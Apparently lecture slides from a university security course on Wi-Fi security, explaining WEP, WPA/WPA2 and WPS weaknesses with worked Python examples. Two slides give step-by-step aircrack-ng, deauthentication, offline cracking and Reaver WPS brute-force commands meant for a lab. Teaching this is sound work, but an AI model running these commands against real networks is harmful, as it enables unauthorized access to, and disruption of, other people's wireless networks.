
Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Password strength

WPS

Wireless Security

Comp Sci 3600 Security


Outline

1 Attacks

2 WEP: Authentication, Encryption, Vulnerabilities

3 WPA/WPA2: Authentication, Encryption, Vulnerabilities, Password strength, WPS


Wired versus wireless

Figure 24.1 Wireless Networking Components (endpoint and access point)


Locations and types of attack



Wired Equivalent Privacy (WEP)

• Security algorithm for IEEE 802.11 wireless networks

• Part of the original 802.11 standard ratified in 1997

• WEP is recognizable by its key of 10 or 26 hexadecimal digits (40 or 104 bits), and was at one time widely in use and was often the first security choice presented to users by router configuration tools.

• C: encrypted

• I: data integrity check

• A: passphrase authentication


WEP authentication

1 A wireless host requests authentication by an access point.

2 The access point responds to the authentication request with a 128-byte nonce value.

3 The wireless host encrypts the nonce using the symmetric key that it shares with the access point.

4 The access point decrypts the host-encrypted nonce.


WEP RC4



WEP RC4 encryption


WEP RC4 decryption


WEP RC4 summary

1 First a 4-byte cyclic redundancy check value is computed for the data payload.

2 The key is the 64-bit (K_S, IV) pair: K_S is the 40-bit shared secret and the IV is 24 bits.

3 The RC4 algorithm produces a stream of key values, k_1^IV, k_2^IV, k_3^IV, ... that are used to encrypt the data and CRC value in a frame.


Encryption and Decryption

• Encryption is performed by XOR-ing the i-th byte of data, d_i, with the i-th key, k_i^IV, in the stream of key values generated by the (K_S, IV) pair to produce the i-th byte of ciphertext, c_i:

c_i = d_i ⊕ k_i^IV

• The IV value changes from one frame to the next and is included in plaintext in the header of each WEP-encrypted 802.11 frame (previous slide)

• The receiver takes the secret 40-bit symmetric key that it shares with the sender, appends the IV, and uses the resulting 64-bit key (which is identical to the key used by the sender to perform encryption) to decrypt the frame:

d_i = c_i ⊕ k_i^IV


Flaw 1: keystream re-use

• Proper use of the RC4 algorithm requires that the same 64-bit key value never be used more than once. Recall that the WEP key changes on a frame-by-frame basis.

• For a given K_S (which changes rarely, if ever), this means that there are only 2^24 unique keys.

• If these keys are chosen randomly, the probability of having chosen the same IV value (and hence used the same 64-bit key) is more than 99 percent after only 12,000 frames.

• With 1 Kbyte frame sizes and a data transmission rate of 11 Mbps, only a few seconds are needed before 12,000 frames are transmitted.

• Since the IV is transmitted in plaintext in the frame, an eavesdropper will know whenever a duplicate IV value is used.

• Two frames that use the same IV likely use the same secret key and thus the same keystream.
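An added worked example (not from the original slides) covering the WEP RC4 summary, the encryption/decryption equations and Flaw 1 above: RC4 seeded with the 24-bit IV and 40-bit K_S, a CRC-32 ICV, the XOR of two frames sent under one IV, and the exact birthday calculation behind the 12,000-frame figure. The key, IV and payloads are constructed sample values.

```python
import math
import zlib

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA), then `length` PRGA output bytes k_1, k_2, ..."""
    S, j = list(range(256)), 0
    for i in range(256):                                        # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):                                     # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(ks: bytes, iv: bytes, data: bytes) -> bytes:
    """WEP-40 frame body: IV in the clear || RC4_{IV||K_S}(data || CRC-32 ICV).
    802.11 seeds RC4 with the 24-bit IV followed by the 40-bit secret K_S."""
    assert len(ks) == 5 and len(iv) == 3
    payload = data + zlib.crc32(data).to_bytes(4, "little")    # step 1: 4-byte CRC
    stream = rc4_keystream(iv + ks, len(payload))              # steps 2-3: 64-bit seed
    return iv + bytes(d ^ k for d, k in zip(payload, stream))  # c_i = d_i XOR k_i^IV

def wep_decrypt(ks: bytes, frame: bytes) -> bytes:
    """Receiver: take IV from the header, regenerate the keystream, XOR, verify ICV."""
    iv, body = frame[:3], frame[3:]
    stream = rc4_keystream(iv + ks, len(body))
    plain = bytes(c ^ k for c, k in zip(body, stream))         # d_i = c_i XOR k_i^IV
    if zlib.crc32(plain[:-4]).to_bytes(4, "little") != plain[-4:]:
        raise ValueError("ICV mismatch")
    return plain[:-4]

def keystream_reuse_leak(ks: bytes, iv: bytes, d1: bytes, d2: bytes) -> bytes:
    """Flaw 1: two frames under one IV share a keystream, so XOR-ing their ciphertext
    bodies cancels it and yields d1 XOR d2 without any knowledge of K_S."""
    c1, c2 = wep_encrypt(ks, iv, d1)[3:], wep_encrypt(ks, iv, d2)[3:]
    return bytes(a ^ b for a, b in zip(c1, c2))

def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Exact birthday probability that some IV repeats among `frames` random IVs."""
    log_no_repeat = sum(math.log1p(-i / 2 ** iv_bits) for i in range(frames))
    return 1.0 - math.exp(log_no_repeat)

# Constructed sample values, not taken from any real network.
KS, IV = bytes.fromhex("0badc0ffee"), bytes.fromhex("a1b2c3")
D1, D2 = b"GET /index.html", b"GET /secret.txt"
```

The leaked XOR starts with five zero bytes because both sample payloads share the prefix "GET /", which is exactly the kind of structure that lets an eavesdropper recover plaintext from reused keystream.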


More flaws

• The cyclic redundancy check is not cryptographically secure: an attacker who changes the encrypted content (e.g., substituting gibberish for the original encrypted data), computes a CRC over the substituted gibberish, and places the CRC into a WEP frame can produce an 802.11 frame that will be accepted by the receiver.

• Weak keys are often chosen.

• The RC4 pseudo-random generator is weak too: its first keystream bytes are biased and leak information about the key.


https://en.wikipedia.org/wiki/Aircrack-ng

Let’s check out a practical attack using our Kali VMs

• https://kalitutorials.wordpress.com/2014/07/10/wifi-hack-crack-wep-passwords-with-kali/

• http://www.wirelesshack.org/step-by-step-kali-linux-and-wireless-hacking-basics-wep-hacking-part-3.html

• https://www.hackingloops.com/crack-wep-wifi-using-kali-linux/

• https://teachmehacking.com/aircrack-ng-hack-wifi/

• http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/

• https://lifehacker.com/5305094/how-to-crack-a-wi-fi-networks-wep-password-with-backtrack


WPA and WPA2

• WPA (sometimes referred to as the draft IEEE 802.11i standard) became available in 2003.

• The Wi-Fi Alliance intended it as an intermediate measure in anticipation of the availability of the more secure and complex WPA2, which became available in 2004 and is a common shorthand for the full IEEE 802.11i (or IEEE 802.11i-2004) standard.


Authentication

1 WPA-personal: Also referred to as WPA-PSK (pre-shared key) mode, this is designed for home and small office networks and doesn’t require an authentication server.

2 WPA-enterprise: Also referred to as WPA-802.1X mode, and sometimes just WPA (as opposed to WPA-PSK), this is designed for enterprise networks and requires a RADIUS authentication server. This requires a more complicated setup, but provides additional security (e.g. protection against dictionary attacks on short passwords).

3 Wi-Fi Protected Setup (WPS): This is an alternative authentication key distribution method intended to simplify and strengthen the process, but which, as widely implemented, creates a major security hole via WPS PIN recovery.


Authentication

• After the PSK or 802.1X authentication, a shared secret key is generated, called the Pairwise Master Key (PMK).

• The PMK is derived from a password that is put through PBKDF2-SHA1 as the cryptographic hash function.

• In a pre-shared-key network, the PMK is actually the PSK.

• If an 802.1X EAP exchange was carried out, the PMK is derived from the EAP parameters provided by the authentication server.
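An added example (not from the slides) of the PSK-mode PMK derivation described above. IEEE 802.11i defines PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits), so the SSID is the salt; the small table shows why a precomputed PMK table works only for the SSID it was built for, which is why a unique SSID and a long passphrase both raise an attacker's cost. The word list and the second SSID are constructed.

```python
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for WPA/WPA2-PSK
PMK_LEN = 32               # 256-bit Pairwise Master Key

def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, salt = SSID, 4096 iterations, 256 bits).
    In PSK mode this value is the PMK (the slide's "PMK is actually the PSK")."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)

def build_pmk_table(wordlist, ssid: str) -> dict:
    """Precompute PMK -> passphrase for ONE SSID; this is what a precomputed
    (genpmk/cowpatty-style) hash table is. Each entry costs 4096 HMAC-SHA1 rounds."""
    return {wpa_psk(w, ssid): w for w in wordlist}

def table_hit(table: dict, pmk: bytes):
    """Passphrase whose precomputed PMK equals `pmk`, or None if the table cannot help."""
    return table.get(pmk)

# Constructed sample word list and SSID (not a real dictionary or a real network).
SAMPLE_WORDS = ["password", "letmein1", "sunshine", "qwertyuiop"]

def demo() -> dict:
    table = build_pmk_table(SAMPLE_WORDS, "IEEE")
    pmk_ieee = wpa_psk("password", "IEEE")          # IEEE 802.11i Annex H test vector
    pmk_other = wpa_psk("password", "Home-7f3a")    # same passphrase, different SSID
    return {
        "pmk_ieee_hex": pmk_ieee.hex(),
        "hit_same_ssid": table_hit(table, pmk_ieee),    # table was built for this SSID
        "hit_other_ssid": table_hit(table, pmk_other),  # None: salt differs, table useless
    }
```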


Authentication (PSK mode)




Encryption

• TKIP (Temporal Key Integrity Protocol): The RC4 stream cipher is used with a 128-bit per-packet key, meaning that it dynamically generates a new key for each packet. This is used by WPA.

• CCMP (CTR mode with CBC-MAC Protocol): The protocol used by WPA2, based on the Advanced Encryption Standard (AES) cipher along with strong message authenticity and integrity checking, is significantly stronger in protection for both privacy and integrity than the RC4-based TKIP that is used by WPA. Informal names are "AES" and "AES-CCMP".


AES: CTR mode (nonce is IV here)


CBC-MAC

To calculate the CBC-MAC of message m, one encrypts m in CBC mode with a zero initialization vector. The blocks m_1||m_2||...||m_x are chained using a secret key k and a block cipher E:
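An added example (not from the slides) of the CBC-MAC definition above, with a SHA-256-based keyed function standing in for the block cipher E, since CBC-MAC only ever calls E forward. It also shows the caveat behind CCMP's design: raw CBC-MAC over variable-length messages admits a length-extension forgery, which binding the length into the first block (as CCM's B0 block does) removes. The key and message are constructed.

```python
import hashlib

BLOCK = 16   # 128-bit blocks, as with AES in CCMP

def E(k: bytes, x: bytes) -> bytes:
    """Stand-in block cipher: a keyed PRF from SHA-256 truncated to one block. CBC-MAC
    never needs E's inverse, so any AES-like keyed 16-byte function illustrates it."""
    assert len(x) == BLOCK
    return hashlib.sha256(k + x).digest()[:BLOCK]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(p ^ q for p, q in zip(a, b))

def blocks(m: bytes) -> list:
    assert len(m) % BLOCK == 0, "messages assumed block-aligned (CCM zero-pads)"
    return [m[i:i + BLOCK] for i in range(0, len(m), BLOCK)]

def cbc_mac(k: bytes, m: bytes) -> bytes:
    """CBC-MAC: CBC-encrypt m_1||...||m_x under k with a zero IV, keep the last block."""
    c = bytes(BLOCK)                     # zero initialization vector
    for mi in blocks(m):
        c = E(k, xor(c, mi))             # c_i = E_k(c_{i-1} XOR m_i)
    return c

def length_extension_forgery(m1: bytes, t1: bytes) -> bytes:
    """Caveat: from one valid pair (m1, t1) with single-block m1, the two-block message
    m1 || (m1 XOR t1) has the same raw CBC-MAC, since E(m1 XOR t1 XOR t1) = E(m1) = t1."""
    return m1 + xor(m1, t1)

def cbc_mac_with_length(k: bytes, m: bytes) -> bytes:
    """CCM-style fix: put the message length in the first block (CCM's B0 also carries
    the nonce), so a tag computed over one length never verifies for another."""
    return cbc_mac(k, len(m).to_bytes(BLOCK, "big") + m)

# Constructed sample key and one-block message (not real CCMP inputs).
KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f")
M1 = b"16-byte block #1"
```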


Vulnerabilities

These come in two main categories

1 Exploits on proper function which has been mis-managed by the user

  • Weak password

2 Actual flaws/bugs to be exploited

  • WPA packet spoofing and decryption

  • WPS PIN recovery

  • MS-CHAPv2 design weakness

  • Shared Group Temporal Key (GTK) flaw (hole196)

  • Lack of forward secrecy (e.g., no use of DH)

  • Predictable Group Temporal Key (GTK)

  • KRACK attack (a replay attack)


Attack on WPA/WPA2 weak passwords

1 Kick someone off their network

2 Capture the traffic when they perform their 4-way handshake, which contains a hash of the password

3 Crack the password offline using a dictionary, rainbow table, or brute force

• https://geekviews.tech/aircrack-ng-tutorial/

• https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/


Attack on WPA/WPA2 weak passwords

• Setup and choose network

  • airmon-ng start wlan0   # put wlan0 in monitor mode

  • airodump-ng wlan0mon    # check out networks

• Capture traffic on network of interest

  • airodump-ng -c 11 --bssid 00:07:26:47:B0:35 -w capfile wlan0mon   # capture traffic

• Deauthenticate (kick off) – these are ALTERNATIVES

  • aireplay-ng --deauth 4 -a 00:07:26:47:B0:35 wlan0mon

  • mdk3 wlan0mon d -b 00:07:26:47:B0:35 -c 4

  • aireplay-ng --ignore-negative-one -0 10 -a 'AP MAC' -c 'Client MAC' wlan0mon

• Crack capfile offline – these are ALTERNATIVES

  • aircrack-ng -b 00:07:26:47:B0:35 capfile.cap -w /usr/share/john/password.lst   # dictionary

  • cowpatty -r acm_dictionary-01.cap -d dictionary_hash -s dictionary   # rainbow table

  • john --stdout --incremental:all | aircrack-ng -b 00:1a:c4:51:3c:31 -w - acm_dictionary-01.cap   # brute force


Wifi Protected Setup

• Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases.

• When an enrollee attempts to gain access using a PIN, the registrar reports the validity of the first and second halves of the PIN separately.

• Since the first half of the PIN consists of four digits (10,000 possibilities) and the second half has only three active digits (1,000 possibilities), at most 11,000 guesses are needed before the PIN is recovered.
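An added example (not from the slides) that reproduces the 11,000-guess figure above by enumeration rather than assumption: the eighth WPS PIN digit is a checksum of the first seven (the 3,1,3,1,... weighting comes from the WPS specification), so a registrar that judges the halves separately collapses the search from 10^7 well-formed PINs to 10^4 + 10^3.

```python
def wps_checksum_digit(first_seven: str) -> int:
    """8th PIN digit per the WPS spec: weighted digit sum (3,1,3,1,3,1,3) mod 10."""
    assert len(first_seven) == 7 and first_seven.isdigit()
    acc = sum((3 if i % 2 == 0 else 1) * int(ch) for i, ch in enumerate(first_seven))
    return (10 - acc % 10) % 10

def is_valid_pin(pin: str) -> bool:
    """A PIN is well-formed when its last digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum_digit(pin[:7])

def valid_second_halves(first_half: str) -> int:
    """How many 4-digit second halves pass the checksum for a fixed first half: only
    the three 'active' digits are free and the fourth is forced, so this is 10**3."""
    return sum(is_valid_pin(first_half + f"{n:04d}") for n in range(10 ** 4))

def guess_counts(first_half: str = "1234") -> dict:
    """Worst-case guesses against a registrar that judges the whole PIN at once versus
    one that reports each half separately (the WPS message flow does the latter)."""
    n_first, n_second = 10 ** 4, valid_second_halves(first_half)
    return {"whole_pin": n_first * n_second,          # 10^7 well-formed PINs
            "halves_separately": n_first + n_second}  # 11,000, as the slide states
```

The defender's lever is the registrar side: disabling PIN-based WPS, or locking out after a handful of failed attempts, removes the oracle that makes the split count meaningful.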


Wifi Protected Setup attack software

• Reaver (online/realtime attack) https://code.google.com/archive/p/reaver-wps/wikis/README.wiki

• Bully (online/realtime attack) https://null-byte.wonderhowto.com/how-to/hack-wi-fi-breaking-wps-pin-get-password-with-bully-0158819/ and https://tools.kali.org/wireless-attacks/bully

• PixieWPS (offline attack specific to some vendors) in combination with Reaver or Bully https://github.com/wiire-a/pixiewps


Wifi Protected Setup: Reaver steps

ifconfig                                       # see your interface name
airmon-ng start wlan0                          # or your interface name
airodump-ng wlan0mon                           # to see networks
wash -i wlan0mon                               # to see WPS networks only
reaver -i wlan0mon --bssid 00:01:02:03:04:05   # the good stuff

# If you get rate-limited, there are many further options
# You can also change your MAC first, but it needs to be specified in Reaver execution as a flag